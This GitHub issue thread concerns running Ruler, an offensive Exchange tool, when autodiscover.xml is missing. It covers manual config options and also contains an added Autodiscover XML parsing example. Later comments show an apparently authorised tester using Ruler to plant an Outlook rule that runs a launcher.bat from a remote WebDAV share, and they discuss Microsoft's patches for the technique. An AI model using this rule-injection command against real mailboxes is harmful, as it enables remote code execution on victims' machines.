No autodiscover.xml #31
Comments
Hi, thank you, I hope it's been of use. Unfortunately no, there is no way, as there are specific values coming out of the autodiscover.xml that are required. In particular the DN for the user
This is required for the MAPI authenticate happening, and is separated from the usual user credentials. I haven't found a way to get this value other than through the autodiscover unfortunately. I would try looking around at other possible locations such as:
^ the last one might be relevant as I see that you receive a 301 from the first discover request, which ruler may not be following correctly (although it should) hope this helps! |
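The reply above names the user's DN as a value taken from the Autodiscover response. As an added example (not part of the thread and not Ruler's code), this parses a constructed response in the Outlook Autodiscover schema and reports which connection fields it supplies; the sample values and the function names are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Namespace of the Outlook Autodiscover response payload.
NS = {"o": "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"}

# Constructed sample response; every value below is made up for illustration.
SAMPLE = """\
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
 <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
  <User>
   <LegacyDN>/o=Example/ou=Exchange Administrative Group/cn=Recipients/cn=user1</LegacyDN>
  </User>
  <Account>
   <Action>settings</Action>
   <Protocol>
    <Type>EXCH</Type>
    <Server>11111111-2222-3333-4444-555555555555@example.test</Server>
   </Protocol>
   <Protocol Type="mapiHttp" Version="1">
    <MailStore>
     <ExternalUrl>https://mail.example.test/mapi/emsmdb/</ExternalUrl>
    </MailStore>
   </Protocol>
  </Account>
 </Response>
</Autodiscover>"""

def extract_settings(xml_text):
    """Return the connection fields found in the response (None when absent)."""
    resp = ET.fromstring(xml_text).find("o:Response", NS)
    out = {"action": None, "legacy_dn": None, "exch_server": None, "mapi_http_url": None}
    if resp is None:  # e.g. an error document, which has no Outlook Response element
        return out
    out["action"] = resp.findtext("o:Account/o:Action", namespaces=NS)
    out["legacy_dn"] = resp.findtext("o:User/o:LegacyDN", namespaces=NS)
    for proto in resp.iterfind("o:Account/o:Protocol", NS):
        # Older protocol entries carry a <Type> child; MAPI/HTTP uses a Type attribute.
        ptype = proto.get("Type") or proto.findtext("o:Type", namespaces=NS)
        if ptype == "EXCH":
            out["exch_server"] = proto.findtext("o:Server", namespaces=NS)
        elif ptype == "mapiHttp":
            out["mapi_http_url"] = proto.findtext("o:MailStore/o:ExternalUrl", namespaces=NS)
    return out

def missing_fields(settings):
    """Names of the fields the response did not supply."""
    return sorted(k for k, v in settings.items() if v is None)
```
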
Hi, Thank you for your quick reply. Yes, the tool seems fantastic, this is the first time I'm using it. Since I have already access through OWA I know that information. I'm referring to:
I think we could have another argument to input that string if that's the only thing the tool is getting from discover.xml. What would be your thoughts on that? Also, thank you for your suggestions, I tried all those places and others. Unfortunately, I'm certain the discover.xml file does not exist. It is interesting that the HTTP code is 301, because in that location there is nothing. Thank you |
In that case, it may be possible. Especially if it is using MAPI/HTTP. I have a feeling there might be an issue, for RPC/HTTP, with locating the rpcproxy end-point without the server info from autodiscover. But all the information can in theory be supplied manually. Tomorrow I will have some time to dig into it, maybe I'll add an option to supply a config file with the required info, that could work nicely. |
That's fantastic, I will keep a watch on the tool for that next version. Theoretically, it should solve this problem about not having an autodiscover.xml resource. Thank you very much |
I've created a new branch: https://github.com/sensepost/ruler/tree/manualconfig If you have time and are able to build, it would be great if you can test it out. Alternatively, if you can tell me what OS you are using, I can supply a pre-built binary. Config options override the command-line options, if they are set. The important ones are:
If RPC is used, you need to set the RPC url and set
the Mailbox is : For the RPCURL and MAPI URL, the values need to be the full path, up to the arguments. Basically the same as they are in the current config file. To specify the config: |
I'm impressed. You did this really quickly. Thank you, I will try to build it and test it. Also, I'm running this tool in Kali Linux |
https://github.com/sensepost/ruler/releases/tag/2.1.5 :) Happy to add features! Normally I only find out that Ruler is being used when something breaks. |
Awesome, thank you for the new branch. :-D I was looking at your config.tml file and I tried to replicate the format as much as possible with my information, but I'm getting the following:
It may be the way I'm setting the parameters. What would be your suggestion? Also, I noticed that even though the email, username, and password are set in the config file the tool still expects those parameters to be set on the command line. |
I'll fix the ordering of the params. My current config looks as follows.
A good test would be to go to the RPC url in browser, authenticate and see if you get a 503 error, it is correct. The mailbox needs to be a GUID @ domain |
Thank you for all the info, you have been very helpful. Unfortunately, I'm not able to run the tool successfully. It can also be that the GUID I think I have is not correct. Not sure since in OWA I only see the "Exchange mailbox address", which is in the format:
I equate that to the "userdn" in the tool. The rest of the parameters mailbox (GUID@domain) could be obtained from there, but I haven't been successful. And I may not even have the right mapiurl either. :/ In any case, in my last run I encountered this:
I was running it with "rpc: true" |
I got a feeling the So those are two things I'll dig into,
I'll mess around with this over the next few days 👍 I do like this feature, I've already used it myself! thanks for getting me to look into it |
Ok, I've found a way to get some of the info you need. In OWA, you need to go to Options -> About. From there you need the following info: Still searching for info on the RPC / MAPI URLs 👍 |
Thank you for the info! :) I was using exactly that information from the Options/About tab. But, I wasn't sure of the "mailbox" value, so it is good to confirm. I'm still getting the same problem.
I think it may have to do with the MAPI url. Thank you for taking the time to address this. |
One last try :) I've just had it work for me, so maybe you get lucky as well. There is a pretty good chance that RPC is on the same host as OWA.. so simply add the owa host in the rpcurl I'm pushing updated binaries for Ruler, the config file has an additional line option you'll need to set:
|
Thank you! I will give it a try once you the latest binary. Update: I see you just put it...great!! |
Hi, Just wondering if you can help with the following please? Awesome tool by the way.
./ruler-linux64 --noencrypt --config config.yml check
[+] Binding to RPC
./ruler-linux64 --encrypt --config config.yml check
Incorrect Usage. flag provided but not defined: -encrypt
NAME:
Thanks very much. |
Hi and thanks! The output of To control the encryption you can use the config file (which I see you already are):
If this doesn't work, running with |
I removed the domain from the config and I'm in. Really do appreciate the fast response, the root is calling ;) |
awesome! Happy pwnage Friday! 🎉 😄 😈 |
Not quite yet :-)
./ruler-linux64 --verbose --debug --config config.yml --username bob.smith --name troopers --trigger troopers17 --location "\\192.168.1.10\w\launcher.zip\launcher.bat" --send
Incorrect Usage. flag provided but not defined: -name
There doesn't seem to be any reference to --name --trigger --location and the requirements for these flags? I pulled this command from the video on YouTube. Thanks again for your help. |
I think I have worked it out now with the ./ruler add --help command. The only thing I am struggling with is the --location tab for an internet facing host? I have used the following: --location "\\192.168.13.37\w\launcher.zip\launcher.bat" But this isn't touching the webdav logs? Thanks. |
The location's slashes need to be doubled up when using so: or if using single quotes: |
Excellent thanks, I had a feeling after I posted. It is now running but ruler seems to hang on:
[+] Auto Send enabled, wait 30 seconds before sending email (synchronisation)
Not getting the:
[+] Message sent
I am collaborating with the client and there should be no restriction on the FW, the only thing I can think is AV is catching the launcher? |
strange that the send isn't happening, this should be independent of AV. You could try to either manually send an email with the correct trigger in the subject (say from your company address) or you can try with the
|
That worked a treat, seems after logging into Outlook there is an error with the rule. Upon investigation it looks like Microsoft have patched Outlook to not run scripts by default.
https://support.microsoft.com/en-gb/help/3191883/may-2-2017-update-for-outlook-2016-kb3191883 Thanks again for the support. So near yet so far haha. |
Yes that is correct, they patched rules, and a little while later the forms avenue as well. The homepage patch came out last year September as well. It is probably worth verifying that the other patches have also been applied. Fortunately/Unfortunately they have been shutting down this avenue, so if companies are diligent in applying patches for Office, they should be protected. |
Hi,
Thank you for this awesome tool.
I wonder if there is a way to set the parameter that normally would be parsed from the discover.xml?
My problem is that the Exchange server is not well configured and the discover.xml does not exist. I keep getting the following error.
./ruler-linux64 --email email@address --username name --password Password --basic --verbose check
[+] Retrieving MAPI/HTTP info
[*] Autodiscover step 0 - URL: https://domain/autodiscover/autodiscover.xml
ERROR: 2017/05/04 15:09:35 Failed, StatusCode [301]
[*] Autodiscover step 1 - URL: https://autodiscover.domain/autodiscover/autodiscover.xml
[*] Autodiscover step 2 - URL: http://autodiscover.domain/autodiscover/autodiscover.xml
ERROR: 2017/05/04 15:09:36 Failed, StatusCode [404]
ERROR: 2017/05/04 15:09:36 The autodiscover service request did not complete.
Permission Denied or URL not found: StatusCode [404]
I know I could set the URI with --url, but the problem is that there is no discover.xml.
Thank you